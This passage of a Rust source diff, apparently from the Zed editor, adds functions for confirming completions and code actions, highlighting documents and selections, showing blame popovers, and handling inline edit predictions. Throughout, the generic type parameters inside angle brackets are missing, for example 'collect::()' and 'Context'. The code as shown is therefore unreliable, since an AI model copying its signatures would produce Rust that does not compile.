completions_menu.entries.borrow(); + let mat = entries.get(item_ix.unwrap_or(completions_menu.selected_item))?; + if self.show_edit_predictions_in_menu() { + self.discard_inline_completion(true, cx); + } + mat.candidate_id + }; + + let buffer_handle = completions_menu.buffer; + let completion = completions_menu + .completions + .borrow() + .get(candidate_id)? 
+ .clone(); + cx.stop_propagation(); + + let snippet; + let new_text; + if completion.is_snippet() { + snippet = Some(Snippet::parse(&completion.new_text).log_err()?); + new_text = snippet.as_ref().unwrap().text.clone(); + } else { + snippet = None; + new_text = completion.new_text.clone(); + }; + + let replace_range = choose_completion_range(&completion, intent, &buffer_handle, cx); + let buffer = buffer_handle.read(cx); + let snapshot = self.buffer.read(cx).snapshot(cx); + let replace_range_multibuffer = { + let excerpt = snapshot + .excerpt_containing(self.selections.newest_anchor().range()) + .unwrap(); + let multibuffer_anchor = snapshot + .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.start)) + .unwrap() + ..snapshot + .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.end)) + .unwrap(); + multibuffer_anchor.start.to_offset(&snapshot) + ..multibuffer_anchor.end.to_offset(&snapshot) + }; + let newest_anchor = self.selections.newest_anchor(); + if newest_anchor.head().buffer_id != Some(buffer.remote_id()) { + return None; + } + + let old_text = buffer + .text_for_range(replace_range.clone()) + .collect::(); + let lookbehind = newest_anchor + .start + .text_anchor + .to_offset(buffer) + .saturating_sub(replace_range.start); + let lookahead = replace_range + .end + .saturating_sub(newest_anchor.end.text_anchor.to_offset(buffer)); + let prefix = &old_text[..old_text.len().saturating_sub(lookahead)]; + let suffix = &old_text[lookbehind.min(old_text.len())..]; + + let selections = self.selections.all::(cx); + let mut ranges = Vec::new(); + let mut linked_edits = HashMap::<_, Vec<_>>::default(); + + for selection in &selections { + let range = if selection.id == newest_anchor.id { + replace_range_multibuffer.clone() + } else { + let mut range = selection.range(); + + // if prefix is present, don't duplicate it + if snapshot.contains_str_at(range.start.saturating_sub(lookbehind), prefix) { + range.start = 
range.start.saturating_sub(lookbehind); + + // if suffix is also present, mimic the newest cursor and replace it + if selection.id != newest_anchor.id + && snapshot.contains_str_at(range.end, suffix) + { + range.end += lookahead; + } + } + range + }; + + ranges.push(range); + + if !self.linked_edit_ranges.is_empty() { + let start_anchor = snapshot.anchor_before(selection.head()); + let end_anchor = snapshot.anchor_after(selection.tail()); + if let Some(ranges) = self + .linked_editing_ranges_for(start_anchor.text_anchor..end_anchor.text_anchor, cx) + { + for (buffer, edits) in ranges { + linked_edits + .entry(buffer.clone()) + .or_default() + .extend(edits.into_iter().map(|range| (range, new_text.to_owned()))); + } + } + } + } + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: None, + text: new_text.clone().into(), + }); + + self.transact(window, cx, |this, window, cx| { + if let Some(mut snippet) = snippet { + snippet.text = new_text.to_string(); + this.insert_snippet(&ranges, snippet, window, cx).log_err(); + } else { + this.buffer.update(cx, |buffer, cx| { + let auto_indent = match completion.insert_text_mode { + Some(InsertTextMode::AS_IS) => None, + _ => this.autoindent_mode.clone(), + }; + let edits = ranges.into_iter().map(|range| (range, new_text.as_str())); + buffer.edit(edits, auto_indent, cx); + }); + } + for (buffer, edits) in linked_edits { + buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(); + let edits = edits + .into_iter() + .map(|(range, text)| { + use text::ToPoint as TP; + let end_point = TP::to_point(&range.end, &snapshot); + let start_point = TP::to_point(&range.start, &snapshot); + (start_point..end_point, text) + }) + .sorted_by_key(|(range, _)| range.start); + buffer.edit(edits, None, cx); + }) + } + + this.refresh_inline_completion(true, false, window, cx); + }); + + let show_new_completions_on_confirm = completion + .confirm + .as_ref() + .map_or(false, |confirm| confirm(intent, window, cx)); + if 
show_new_completions_on_confirm { + self.show_completions(&ShowCompletions { trigger: None }, window, cx); + } + + let provider = self.completion_provider.as_ref()?; + drop(completion); + let apply_edits = provider.apply_additional_edits_for_completion( + buffer_handle, + completions_menu.completions.clone(), + candidate_id, + true, + cx, + ); + + let editor_settings = EditorSettings::get_global(cx); + if editor_settings.show_signature_help_after_edits || editor_settings.auto_signature_help { + // After the code completion is finished, users often want to know what signatures are needed. + // so we should automatically call signature_help + self.show_signature_help(&ShowSignatureHelp, window, cx); + } + + Some(cx.foreground_executor().spawn(async move { + apply_edits.await?; + Ok(()) + })) + } + + pub fn toggle_code_actions( + &mut self, + action: &ToggleCodeActions, + window: &mut Window, + cx: &mut Context, + ) { + let quick_launch = action.quick_launch; + let mut context_menu = self.context_menu.borrow_mut(); + if let Some(CodeContextMenu::CodeActions(code_actions)) = context_menu.as_ref() { + if code_actions.deployed_from_indicator == action.deployed_from_indicator { + // Toggle if we're selecting the same one + *context_menu = None; + cx.notify(); + return; + } else { + // Otherwise, clear it and start a new one + *context_menu = None; + cx.notify(); + } + } + drop(context_menu); + let snapshot = self.snapshot(window, cx); + let deployed_from_indicator = action.deployed_from_indicator; + let mut task = self.code_actions_task.take(); + let action = action.clone(); + cx.spawn_in(window, async move |editor, cx| { + while let Some(prev_task) = task { + prev_task.await.log_err(); + task = editor.update(cx, |this, _| this.code_actions_task.take())?; + } + + let spawned_test_task = editor.update_in(cx, |editor, window, cx| { + if editor.focus_handle.is_focused(window) { + let multibuffer_point = action + .deployed_from_indicator + .map(|row| DisplayPoint::new(row, 
0).to_point(&snapshot)) + .unwrap_or_else(|| editor.selections.newest::(cx).head()); + let (buffer, buffer_row) = snapshot + .buffer_snapshot + .buffer_line_for_row(MultiBufferRow(multibuffer_point.row)) + .and_then(|(buffer_snapshot, range)| { + editor + .buffer + .read(cx) + .buffer(buffer_snapshot.remote_id()) + .map(|buffer| (buffer, range.start.row)) + })?; + let (_, code_actions) = editor + .available_code_actions + .clone() + .and_then(|(location, code_actions)| { + let snapshot = location.buffer.read(cx).snapshot(); + let point_range = location.range.to_point(&snapshot); + let point_range = point_range.start.row..=point_range.end.row; + if point_range.contains(&buffer_row) { + Some((location, code_actions)) + } else { + None + } + }) + .unzip(); + let buffer_id = buffer.read(cx).remote_id(); + let tasks = editor + .tasks + .get(&(buffer_id, buffer_row)) + .map(|t| Arc::new(t.to_owned())); + if tasks.is_none() && code_actions.is_none() { + return None; + } + + editor.completion_tasks.clear(); + editor.discard_inline_completion(false, cx); + let task_context = + tasks + .as_ref() + .zip(editor.project.clone()) + .map(|(tasks, project)| { + Self::build_tasks_context(&project, &buffer, buffer_row, tasks, cx) + }); + + Some(cx.spawn_in(window, async move |editor, cx| { + let task_context = match task_context { + Some(task_context) => task_context.await, + None => None, + }; + let resolved_tasks = + tasks + .zip(task_context.clone()) + .map(|(tasks, task_context)| ResolvedTasks { + templates: tasks.resolve(&task_context).collect(), + position: snapshot.buffer_snapshot.anchor_before(Point::new( + multibuffer_point.row, + tasks.column, + )), + }); + let spawn_straight_away = quick_launch + && resolved_tasks + .as_ref() + .map_or(false, |tasks| tasks.templates.len() == 1) + && code_actions + .as_ref() + .map_or(true, |actions| actions.is_empty()); + let debug_scenarios = editor.update(cx, |editor, cx| { + if cx.has_flag::() { + maybe!({ + let project = 
editor.project.as_ref()?; + let dap_store = project.read(cx).dap_store(); + let mut scenarios = vec![]; + let resolved_tasks = resolved_tasks.as_ref()?; + let debug_adapter: SharedString = buffer + .read(cx) + .language()? + .context_provider()? + .debug_adapter()? + .into(); + dap_store.update(cx, |this, cx| { + for (_, task) in &resolved_tasks.templates { + if let Some(scenario) = this + .debug_scenario_for_build_task( + task.resolved.clone(), + SharedString::from( + task.original_task().label.clone(), + ), + debug_adapter.clone(), + cx, + ) + { + scenarios.push(scenario); + } + } + }); + Some(scenarios) + }) + .unwrap_or_default() + } else { + vec![] + } + })?; + if let Ok(task) = editor.update_in(cx, |editor, window, cx| { + *editor.context_menu.borrow_mut() = + Some(CodeContextMenu::CodeActions(CodeActionsMenu { + buffer, + actions: CodeActionContents::new( + resolved_tasks, + code_actions, + debug_scenarios, + task_context.unwrap_or_default(), + ), + selected_item: Default::default(), + scroll_handle: UniformListScrollHandle::default(), + deployed_from_indicator, + })); + if spawn_straight_away { + if let Some(task) = editor.confirm_code_action( + &ConfirmCodeAction { item_ix: Some(0) }, + window, + cx, + ) { + cx.notify(); + return task; + } + } + cx.notify(); + Task::ready(Ok(())) + }) { + task.await + } else { + Ok(()) + } + })) + } else { + Some(Task::ready(Ok(()))) + } + })?; + if let Some(task) = spawned_test_task { + task.await?; + } + + anyhow::Ok(()) + }) + .detach_and_log_err(cx); + } + + pub fn confirm_code_action( + &mut self, + action: &ConfirmCodeAction, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let actions_menu = + if let CodeContextMenu::CodeActions(menu) = self.hide_context_menu(window, cx)? 
{ + menu + } else { + return None; + }; + + let action_ix = action.item_ix.unwrap_or(actions_menu.selected_item); + let action = actions_menu.actions.get(action_ix)?; + let title = action.label(); + let buffer = actions_menu.buffer; + let workspace = self.workspace()?; + + match action { + CodeActionsItem::Task(task_source_kind, resolved_task) => { + workspace.update(cx, |workspace, cx| { + workspace.schedule_resolved_task( + task_source_kind, + resolved_task, + false, + window, + cx, + ); + + Some(Task::ready(Ok(()))) + }) + } + CodeActionsItem::CodeAction { + excerpt_id, + action, + provider, + } => { + let apply_code_action = + provider.apply_code_action(buffer, action, excerpt_id, true, window, cx); + let workspace = workspace.downgrade(); + Some(cx.spawn_in(window, async move |editor, cx| { + let project_transaction = apply_code_action.await?; + Self::open_project_transaction( + &editor, + workspace, + project_transaction, + title, + cx, + ) + .await + })) + } + CodeActionsItem::DebugScenario(scenario) => { + let context = actions_menu.actions.context.clone(); + + workspace.update(cx, |workspace, cx| { + workspace.start_debug_session(scenario, context, Some(buffer), window, cx); + }); + Some(Task::ready(Ok(()))) + } + } + } + + pub async fn open_project_transaction( + this: &WeakEntity, + workspace: WeakEntity, + transaction: ProjectTransaction, + title: String, + cx: &mut AsyncWindowContext, + ) -> Result<()> { + let mut entries = transaction.0.into_iter().collect::>(); + cx.update(|_, cx| { + entries.sort_unstable_by_key(|(buffer, _)| { + buffer.read(cx).file().map(|f| f.path().clone()) + }); + })?; + + // If the project transaction's edits are all contained within this editor, then + // avoid opening a new editor to display them. 
+ + if let Some((buffer, transaction)) = entries.first() { + if entries.len() == 1 { + let excerpt = this.update(cx, |editor, cx| { + editor + .buffer() + .read(cx) + .excerpt_containing(editor.selections.newest_anchor().head(), cx) + })?; + if let Some((_, excerpted_buffer, excerpt_range)) = excerpt { + if excerpted_buffer == *buffer { + let all_edits_within_excerpt = buffer.read_with(cx, |buffer, _| { + let excerpt_range = excerpt_range.to_offset(buffer); + buffer + .edited_ranges_for_transaction::(transaction) + .all(|range| { + excerpt_range.start <= range.start + && excerpt_range.end >= range.end + }) + })?; + + if all_edits_within_excerpt { + return Ok(()); + } + } + } + } + } else { + return Ok(()); + } + + let mut ranges_to_highlight = Vec::new(); + let excerpt_buffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(Capability::ReadWrite).with_title(title); + for (buffer_handle, transaction) in &entries { + let edited_ranges = buffer_handle + .read(cx) + .edited_ranges_for_transaction::(transaction) + .collect::>(); + let (ranges, _) = multibuffer.set_excerpts_for_path( + PathKey::for_buffer(buffer_handle, cx), + buffer_handle.clone(), + edited_ranges, + DEFAULT_MULTIBUFFER_CONTEXT, + cx, + ); + + ranges_to_highlight.extend(ranges); + } + multibuffer.push_transaction(entries.iter().map(|(b, t)| (b, t)), cx); + multibuffer + })?; + + workspace.update_in(cx, |workspace, window, cx| { + let project = workspace.project().clone(); + let editor = + cx.new(|cx| Editor::for_multibuffer(excerpt_buffer, Some(project), window, cx)); + workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); + editor.update(cx, |editor, cx| { + editor.highlight_background::( + &ranges_to_highlight, + |theme| theme.editor_highlighted_line_background, + cx, + ); + }); + })?; + + Ok(()) + } + + pub fn clear_code_action_providers(&mut self) { + self.code_action_providers.clear(); + self.available_code_actions.take(); + } + + pub fn 
add_code_action_provider( + &mut self, + provider: Rc, + window: &mut Window, + cx: &mut Context, + ) { + if self + .code_action_providers + .iter() + .any(|existing_provider| existing_provider.id() == provider.id()) + { + return; + } + + self.code_action_providers.push(provider); + self.refresh_code_actions(window, cx); + } + + pub fn remove_code_action_provider( + &mut self, + id: Arc, + window: &mut Window, + cx: &mut Context, + ) { + self.code_action_providers + .retain(|provider| provider.id() != id); + self.refresh_code_actions(window, cx); + } + + fn refresh_code_actions(&mut self, window: &mut Window, cx: &mut Context) -> Option<()> { + let newest_selection = self.selections.newest_anchor().clone(); + let newest_selection_adjusted = self.selections.newest_adjusted(cx).clone(); + let buffer = self.buffer.read(cx); + if newest_selection.head().diff_base_anchor.is_some() { + return None; + } + let (start_buffer, start) = + buffer.text_anchor_for_position(newest_selection_adjusted.start, cx)?; + let (end_buffer, end) = + buffer.text_anchor_for_position(newest_selection_adjusted.end, cx)?; + if start_buffer != end_buffer { + return None; + } + + self.code_actions_task = Some(cx.spawn_in(window, async move |this, cx| { + cx.background_executor() + .timer(CODE_ACTIONS_DEBOUNCE_TIMEOUT) + .await; + + let (providers, tasks) = this.update_in(cx, |this, window, cx| { + let providers = this.code_action_providers.clone(); + let tasks = this + .code_action_providers + .iter() + .map(|provider| provider.code_actions(&start_buffer, start..end, window, cx)) + .collect::>(); + (providers, tasks) + })?; + + let mut actions = Vec::new(); + for (provider, provider_actions) in + providers.into_iter().zip(future::join_all(tasks).await) + { + if let Some(provider_actions) = provider_actions.log_err() { + actions.extend(provider_actions.into_iter().map(|action| { + AvailableCodeAction { + excerpt_id: newest_selection.start.excerpt_id, + action, + provider: provider.clone(), + } + 
})); + } + } + + this.update(cx, |this, cx| { + this.available_code_actions = if actions.is_empty() { + None + } else { + Some(( + Location { + buffer: start_buffer, + range: start..end, + }, + actions.into(), + )) + }; + cx.notify(); + }) + })); + None + } + + fn start_inline_blame_timer(&mut self, window: &mut Window, cx: &mut Context) { + if let Some(delay) = ProjectSettings::get_global(cx).git.inline_blame_delay() { + self.show_git_blame_inline = false; + + self.show_git_blame_inline_delay_task = + Some(cx.spawn_in(window, async move |this, cx| { + cx.background_executor().timer(delay).await; + + this.update(cx, |this, cx| { + this.show_git_blame_inline = true; + cx.notify(); + }) + .log_err(); + })); + } + } + + fn show_blame_popover( + &mut self, + blame_entry: &BlameEntry, + position: gpui::Point, + cx: &mut Context, + ) { + if let Some(state) = &mut self.inline_blame_popover { + state.hide_task.take(); + cx.notify(); + } else { + let delay = EditorSettings::get_global(cx).hover_popover_delay; + let show_task = cx.spawn(async move |editor, cx| { + cx.background_executor() + .timer(std::time::Duration::from_millis(delay)) + .await; + editor + .update(cx, |editor, cx| { + if let Some(state) = &mut editor.inline_blame_popover { + state.show_task = None; + cx.notify(); + } + }) + .ok(); + }); + let Some(blame) = self.blame.as_ref() else { + return; + }; + let blame = blame.read(cx); + let details = blame.details_for_entry(&blame_entry); + let markdown = cx.new(|cx| { + Markdown::new( + details + .as_ref() + .map(|message| message.message.clone()) + .unwrap_or_default(), + None, + None, + cx, + ) + }); + self.inline_blame_popover = Some(InlineBlamePopover { + position, + show_task: Some(show_task), + hide_task: None, + popover_bounds: None, + popover_state: InlineBlamePopoverState { + scroll_handle: ScrollHandle::new(), + commit_message: details, + markdown, + }, + }); + } + } + + fn hide_blame_popover(&mut self, cx: &mut Context) { + if let Some(state) = &mut 
self.inline_blame_popover { + if state.show_task.is_some() { + self.inline_blame_popover.take(); + cx.notify(); + } else { + let hide_task = cx.spawn(async move |editor, cx| { + cx.background_executor() + .timer(std::time::Duration::from_millis(100)) + .await; + editor + .update(cx, |editor, cx| { + editor.inline_blame_popover.take(); + cx.notify(); + }) + .ok(); + }); + state.hide_task = Some(hide_task); + } + } + } + + fn refresh_document_highlights(&mut self, cx: &mut Context) -> Option<()> { + if self.pending_rename.is_some() { + return None; + } + + let provider = self.semantics_provider.clone()?; + let buffer = self.buffer.read(cx); + let newest_selection = self.selections.newest_anchor().clone(); + let cursor_position = newest_selection.head(); + let (cursor_buffer, cursor_buffer_position) = + buffer.text_anchor_for_position(cursor_position, cx)?; + let (tail_buffer, _) = buffer.text_anchor_for_position(newest_selection.tail(), cx)?; + if cursor_buffer != tail_buffer { + return None; + } + let debounce = EditorSettings::get_global(cx).lsp_highlight_debounce; + self.document_highlights_task = Some(cx.spawn(async move |this, cx| { + cx.background_executor() + .timer(Duration::from_millis(debounce)) + .await; + + let highlights = if let Some(highlights) = cx + .update(|cx| { + provider.document_highlights(&cursor_buffer, cursor_buffer_position, cx) + }) + .ok() + .flatten() + { + highlights.await.log_err() + } else { + None + }; + + if let Some(highlights) = highlights { + this.update(cx, |this, cx| { + if this.pending_rename.is_some() { + return; + } + + let buffer_id = cursor_position.buffer_id; + let buffer = this.buffer.read(cx); + if !buffer + .text_anchor_for_position(cursor_position, cx) + .map_or(false, |(buffer, _)| buffer == cursor_buffer) + { + return; + } + + let cursor_buffer_snapshot = cursor_buffer.read(cx); + let mut write_ranges = Vec::new(); + let mut read_ranges = Vec::new(); + for highlight in highlights { + for (excerpt_id, excerpt_range) 
in + buffer.excerpts_for_buffer(cursor_buffer.read(cx).remote_id(), cx) + { + let start = highlight + .range + .start + .max(&excerpt_range.context.start, cursor_buffer_snapshot); + let end = highlight + .range + .end + .min(&excerpt_range.context.end, cursor_buffer_snapshot); + if start.cmp(&end, cursor_buffer_snapshot).is_ge() { + continue; + } + + let range = Anchor { + buffer_id, + excerpt_id, + text_anchor: start, + diff_base_anchor: None, + }..Anchor { + buffer_id, + excerpt_id, + text_anchor: end, + diff_base_anchor: None, + }; + if highlight.kind == lsp::DocumentHighlightKind::WRITE { + write_ranges.push(range); + } else { + read_ranges.push(range); + } + } + } + + this.highlight_background::( + &read_ranges, + |theme| theme.editor_document_highlight_read_background, + cx, + ); + this.highlight_background::( + &write_ranges, + |theme| theme.editor_document_highlight_write_background, + cx, + ); + cx.notify(); + }) + .log_err(); + } + })); + None + } + + fn prepare_highlight_query_from_selection( + &mut self, + cx: &mut Context, + ) -> Option<(String, Range)> { + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + return None; + } + if !EditorSettings::get_global(cx).selection_highlight { + return None; + } + if self.selections.count() != 1 || self.selections.line_mode { + return None; + } + let selection = self.selections.newest::(cx); + if selection.is_empty() || selection.start.row != selection.end.row { + return None; + } + let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); + let selection_anchor_range = selection.range().to_anchors(&multi_buffer_snapshot); + let query = multi_buffer_snapshot + .text_for_range(selection_anchor_range.clone()) + .collect::(); + if query.trim().is_empty() { + return None; + } + Some((query, selection_anchor_range)) + } + + fn update_selection_occurrence_highlights( + &mut self, + query_text: String, + query_range: Range, + multi_buffer_range_to_query: Range, + use_debounce: bool, + window: &mut Window, + cx: &mut Context, + ) -> Task<()> { + let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); + cx.spawn_in(window, async move |editor, cx| { + if use_debounce { + cx.background_executor() + .timer(SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT) + .await; + } + let match_task = cx.background_spawn(async move { + let buffer_ranges = multi_buffer_snapshot + .range_to_buffer_ranges(multi_buffer_range_to_query) + .into_iter() + .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()); + let mut match_ranges = Vec::new(); + for (buffer_snapshot, search_range, excerpt_id) in buffer_ranges { + match_ranges.extend( + project::search::SearchQuery::text( + query_text.clone(), + false, + false, + false, + Default::default(), + Default::default(), + false, + None, + ) + .unwrap() + .search(&buffer_snapshot, Some(search_range.clone())) + .await + .into_iter() + .filter_map(|match_range| { + let match_start = buffer_snapshot + .anchor_after(search_range.start + match_range.start); + let match_end = + buffer_snapshot.anchor_before(search_range.start + match_range.end); + let match_anchor_range = 
Anchor::range_in_buffer( + excerpt_id, + buffer_snapshot.remote_id(), + match_start..match_end, + ); + (match_anchor_range != query_range).then_some(match_anchor_range) + }), + ); + } + match_ranges + }); + let match_ranges = match_task.await; + editor + .update_in(cx, |editor, _, cx| { + editor.clear_background_highlights::(cx); + if !match_ranges.is_empty() { + editor.highlight_background::( + &match_ranges, + |theme| theme.editor_document_highlight_bracket_background, + cx, + ) + } + }) + .log_err(); + }) + } + + fn refresh_selected_text_highlights( + &mut self, + on_buffer_edit: bool, + window: &mut Window, + cx: &mut Context, + ) { + let Some((query_text, query_range)) = self.prepare_highlight_query_from_selection(cx) + else { + self.clear_background_highlights::(cx); + self.quick_selection_highlight_task.take(); + self.debounced_selection_highlight_task.take(); + return; + }; + let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); + if on_buffer_edit + || self + .quick_selection_highlight_task + .as_ref() + .map_or(true, |(prev_anchor_range, _)| { + prev_anchor_range != &query_range + }) + { + let multi_buffer_visible_start = self + .scroll_manager + .anchor() + .anchor + .to_point(&multi_buffer_snapshot); + let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( + multi_buffer_visible_start + + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), + Bias::Left, + ); + let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; + self.quick_selection_highlight_task = Some(( + query_range.clone(), + self.update_selection_occurrence_highlights( + query_text.clone(), + query_range.clone(), + multi_buffer_visible_range, + false, + window, + cx, + ), + )); + } + if on_buffer_edit + || self + .debounced_selection_highlight_task + .as_ref() + .map_or(true, |(prev_anchor_range, _)| { + prev_anchor_range != &query_range + }) + { + let multi_buffer_start = multi_buffer_snapshot + .anchor_before(0) + 
.to_point(&multi_buffer_snapshot); + let multi_buffer_end = multi_buffer_snapshot + .anchor_after(multi_buffer_snapshot.len()) + .to_point(&multi_buffer_snapshot); + let multi_buffer_full_range = multi_buffer_start..multi_buffer_end; + self.debounced_selection_highlight_task = Some(( + query_range.clone(), + self.update_selection_occurrence_highlights( + query_text, + query_range, + multi_buffer_full_range, + true, + window, + cx, + ), + )); + } + } + + pub fn refresh_inline_completion( + &mut self, + debounce: bool, + user_requested: bool, + window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let provider = self.edit_prediction_provider()?; + let cursor = self.selections.newest_anchor().head(); + let (buffer, cursor_buffer_position) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; + + if !self.edit_predictions_enabled_in_buffer(&buffer, cursor_buffer_position, cx) { + self.discard_inline_completion(false, cx); + return None; + } + + if !user_requested + && (!self.should_show_edit_predictions() + || !self.is_focused(window) + || buffer.read(cx).is_empty()) + { + self.discard_inline_completion(false, cx); + return None; + } + + self.update_visible_inline_completion(window, cx); + provider.refresh( + self.project.clone(), + buffer, + cursor_buffer_position, + debounce, + cx, + ); + Some(()) + } + + fn show_edit_predictions_in_menu(&self) -> bool { + match self.edit_prediction_settings { + EditPredictionSettings::Disabled => false, + EditPredictionSettings::Enabled { show_in_menu, .. } => show_in_menu, + } + } + + pub fn edit_predictions_enabled(&self) -> bool { + match self.edit_prediction_settings { + EditPredictionSettings::Disabled => false, + EditPredictionSettings::Enabled { .. } => true, + } + } + + fn edit_prediction_requires_modifier(&self) -> bool { + match self.edit_prediction_settings { + EditPredictionSettings::Disabled => false, + EditPredictionSettings::Enabled { + preview_requires_modifier, + .. 
+ } => preview_requires_modifier, + } + } + + pub fn update_edit_prediction_settings(&mut self, cx: &mut Context) { + if self.edit_prediction_provider.is_none() { + self.edit_prediction_settings = EditPredictionSettings::Disabled; + } else { + let selection = self.selections.newest_anchor(); + let cursor = selection.head(); + + if let Some((buffer, cursor_buffer_position)) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx) + { + self.edit_prediction_settings = + self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); + } + } + } + + fn edit_prediction_settings_at_position( + &self, + buffer: &Entity, + buffer_position: language::Anchor, + cx: &App, + ) -> EditPredictionSettings { + if !self.mode.is_full() + || !self.show_inline_completions_override.unwrap_or(true) + || self.inline_completions_disabled_in_scope(buffer, buffer_position, cx) + { + return EditPredictionSettings::Disabled; + } + + let buffer = buffer.read(cx); + + let file = buffer.file(); + + if !language_settings(buffer.language().map(|l| l.name()), file, cx).show_edit_predictions { + return EditPredictionSettings::Disabled; + }; + + let by_provider = matches!( + self.menu_inline_completions_policy, + MenuInlineCompletionsPolicy::ByProvider + ); + + let show_in_menu = by_provider + && self + .edit_prediction_provider + .as_ref() + .map_or(false, |provider| { + provider.provider.show_completions_in_menu() + }); + + let preview_requires_modifier = + all_language_settings(file, cx).edit_predictions_mode() == EditPredictionsMode::Subtle; + + EditPredictionSettings::Enabled { + show_in_menu, + preview_requires_modifier, + } + } + + fn should_show_edit_predictions(&self) -> bool { + self.snippet_stack.is_empty() && self.edit_predictions_enabled() + } + + pub fn edit_prediction_preview_is_active(&self) -> bool { + matches!( + self.edit_prediction_preview, + EditPredictionPreview::Active { .. 
} + ) + } + + pub fn edit_predictions_enabled_at_cursor(&self, cx: &App) -> bool { + let cursor = self.selections.newest_anchor().head(); + if let Some((buffer, cursor_position)) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx) + { + self.edit_predictions_enabled_in_buffer(&buffer, cursor_position, cx) + } else { + false + } + } + + fn edit_predictions_enabled_in_buffer( + &self, + buffer: &Entity, + buffer_position: language::Anchor, + cx: &App, + ) -> bool { + maybe!({ + if self.read_only(cx) { + return Some(false); + } + let provider = self.edit_prediction_provider()?; + if !provider.is_enabled(&buffer, buffer_position, cx) { + return Some(false); + } + let buffer = buffer.read(cx); + let Some(file) = buffer.file() else { + return Some(true); + }; + let settings = all_language_settings(Some(file), cx); + Some(settings.edit_predictions_enabled_for_file(file, cx)) + }) + .unwrap_or(false) + } + + fn cycle_inline_completion( + &mut self, + direction: Direction, + window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let provider = self.edit_prediction_provider()?; + let cursor = self.selections.newest_anchor().head(); + let (buffer, cursor_buffer_position) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; + if self.inline_completions_hidden_for_vim_mode || !self.should_show_edit_predictions() { + return None; + } + + provider.cycle(buffer, cursor_buffer_position, direction, cx); + self.update_visible_inline_completion(window, cx); + + Some(()) + } + + pub fn show_inline_completion( + &mut self, + _: &ShowEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if !self.has_active_inline_completion() { + self.refresh_inline_completion(false, true, window, cx); + return; + } + + self.update_visible_inline_completion(window, cx); + } + + pub fn display_cursor_names( + &mut self, + _: &DisplayCursorNames, + window: &mut Window, + cx: &mut Context, + ) { + self.show_cursor_names(window, cx); + } + + fn show_cursor_names(&mut 
self, window: &mut Window, cx: &mut Context) { + self.show_cursor_names = true; + cx.notify(); + cx.spawn_in(window, async move |this, cx| { + cx.background_executor().timer(CURSORS_VISIBLE_FOR).await; + this.update(cx, |this, cx| { + this.show_cursor_names = false; + cx.notify() + }) + .ok() + }) + .detach(); + } + + pub fn next_edit_prediction( + &mut self, + _: &NextEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.has_active_inline_completion() { + self.cycle_inline_completion(Direction::Next, window, cx); + } else { + let is_copilot_disabled = self + .refresh_inline_completion(false, true, window, cx) + .is_none(); + if is_copilot_disabled { + cx.propagate(); + } + } + } + + pub fn previous_edit_prediction( + &mut self, + _: &PreviousEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.has_active_inline_completion() { + self.cycle_inline_completion(Direction::Prev, window, cx); + } else { + let is_copilot_disabled = self + .refresh_inline_completion(false, true, window, cx) + .is_none(); + if is_copilot_disabled { + cx.propagate(); + } + } + } + + pub fn accept_edit_prediction( + &mut self, + _: &AcceptEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.show_edit_predictions_in_menu() { + self.hide_context_menu(window, cx); + } + + let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { + return; + }; + + self.report_inline_completion_event( + active_inline_completion.completion_id.clone(), + true, + cx, + ); + + match &active_inline_completion.completion { + InlineCompletion::Move { target, .. } => { + let target = *target; + + if let Some(position_map) = &self.last_position_map { + if position_map + .visible_row_range + .contains(&target.to_display_point(&position_map.snapshot).row()) + || !self.edit_prediction_requires_modifier() + { + self.unfold_ranges(&[target..target], true, false, cx); + // Note that this is also done in vim's handler of the Tab action. 
+ self.change_selections( + Some(Autoscroll::newest()), + window, + cx, + |selections| { + selections.select_anchor_ranges([target..target]); + }, + ); + self.clear_row_highlights::(); + + self.edit_prediction_preview + .set_previous_scroll_position(None); + } else { + self.edit_prediction_preview + .set_previous_scroll_position(Some( + position_map.snapshot.scroll_anchor, + )); + + self.highlight_rows::( + target..target, + cx.theme().colors().editor_highlighted_line_background, + RowHighlightOptions { + autoscroll: true, + ..Default::default() + }, + cx, + ); + self.request_autoscroll(Autoscroll::fit(), cx); + } + } + } + InlineCompletion::Edit { edits, .. } => { + if let Some(provider) = self.edit_prediction_provider() { + provider.accept(cx); + } + + let snapshot = self.buffer.read(cx).snapshot(cx); + let last_edit_end = edits.last().unwrap().0.end.bias_right(&snapshot); + + self.buffer.update(cx, |buffer, cx| { + buffer.edit(edits.iter().cloned(), None, cx) + }); + + self.change_selections(None, window, cx, |s| { + s.select_anchor_ranges([last_edit_end..last_edit_end]) + }); + + self.update_visible_inline_completion(window, cx); + if self.active_inline_completion.is_none() { + self.refresh_inline_completion(true, true, window, cx); + } + + cx.notify(); + } + } + + self.edit_prediction_requires_modifier_in_indent_conflict = false; + } + + pub fn accept_partial_inline_completion( + &mut self, + _: &AcceptPartialEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { + return; + }; + if self.selections.count() != 1 { + return; + } + + self.report_inline_completion_event( + active_inline_completion.completion_id.clone(), + true, + 